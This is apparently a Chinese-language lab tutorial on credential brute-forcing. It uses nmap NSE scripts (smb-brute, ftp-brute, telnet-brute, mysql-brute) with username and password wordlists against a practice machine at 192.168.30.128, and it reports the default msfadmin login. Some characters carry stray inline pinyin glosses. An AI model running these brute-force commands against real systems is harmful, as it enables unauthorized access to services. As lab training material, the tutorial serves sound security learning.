首先我們來對目標(biāo)系統(tǒng)進(jìn)行一次簡單的掃描,。以確定其開放的服務(wù)有哪些:nmap 192.168.30.128可以看到,目標(biāo)服務(wù)器開放了眾多的服務(wù)端口!
下面我們來對其
SMB 服務(wù)進(jìn)行一個(gè)簡單爆破:**nmap -p445 –script smb-brute.nse –script-args userdb=./user.txt,passdb=./pass.txt
192.168.30.128**可以看到用戶名及密碼均為 msfadmin !
爆破 FTP 服務(wù)密碼及用戶名:**nmap -p21 -sT –script ftp-brute.nse –script-args userdb=./user.txt,passdb=./pass.txt
192.168.30.128**可以看到用戶名及密碼均為 msfadmin !
爆破 TELNET 服務(wù)用戶名及密碼:**nmap -p23 –script telnet-brute.nse –script-args userdb=./user.txt,passdb=./pass.txt
192.168.30.128**可以看到用戶名及密碼均為 msfadmin !
爆破 MYSQL 數(shù)據(jù)庫用戶名及密碼:nmap -p3306 –script mysql-brute.nse –script-args userdb=./user.txt,passdb=./pass.txt 192.168.30.128
關(guān)于MYSQL的爆破,我分別在虛擬機(jī)和物理機(jī)下嘗試均為成功。大致原因和我的網(wǎng)絡(luò)環(huán)境或是軟件本身有關(guān),大家可以自己去嘗試下!